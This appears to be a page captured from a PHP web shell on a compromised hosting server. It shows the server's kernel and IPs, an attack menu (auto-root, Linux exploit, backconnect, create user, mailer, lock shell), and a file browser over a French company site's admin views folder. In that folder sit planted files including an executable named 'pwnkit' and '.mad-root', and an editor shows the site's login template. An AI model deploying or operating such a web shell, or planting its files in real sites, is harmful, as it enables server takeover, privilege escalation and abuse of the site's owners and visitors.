Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
quaadraa /
admin /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
contacts.php
2.22
KB
-rw----r--
dashboard.php
3.3
KB
-rw----r--
layout.php
4.61
KB
-rw----r--
login.php
1.73
KB
-rw----r--
news-edit.php
15.52
KB
-rw----r--
news-form.php
7.39
KB
-rw----r--
news.php
3.55
KB
-rw----r--
page-edit.php
16.18
KB
-rw----r--
pages.php
3
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
settings.php
4.46
KB
-rw----r--
subsidiaries.php
2.1
KB
-rw----r--
subsidiary-edit.php
3.76
KB
-rw----r--
users.php
3.48
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login.php
<!DOCTYPE html> <html lang="fr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Administration — QUAADRAA</title> <link href="https://fonts.googleapis.com/css2?family=Barlow:wght@300;400;500;600&family=Barlow+Condensed:wght@600;700&display=swap" rel="stylesheet"> <link rel="stylesheet" href="/admin/assets/admin.css"> </head> <body class="admin-login-body"> <div class="login-wrapper"> <div class="login-brand"> <img src="/assets/images/logo-quaadra.png" alt="QUAADRAA logo" width="150"> <p class="login-tagline">Administration</p> </div> <div class="login-card"> <h1 class="login-title">Connexion</h1> <?php if ($expired ?? false): ?> <div class="alert alert-warn">Session expirée. Veuillez vous reconnecter.</div> <?php endif; ?> <?php if (!empty($error)): ?> <div class="alert alert-error"><?= htmlspecialchars($error) ?></div> <?php endif; ?> <form method="POST" action="/admin/login"> <?= \App\Core\Security::csrfField() ?> <div class="field"> <label for="email">Email</label> <input type="email" id="email" name="email" required placeholder="admin@quaadra.com" autocomplete="email"> </div> <div class="field"> <label for="password">Mot de passe</label> <input type="password" id="password" name="password" required placeholder="••••••••" autocomplete="current-password"> </div> <button type="submit" class="btn-login">Se connecter</button> </form> </div> <p class="login-back"> <a href="/">← Retour au site</a> </p> </div> </body> </html>
Close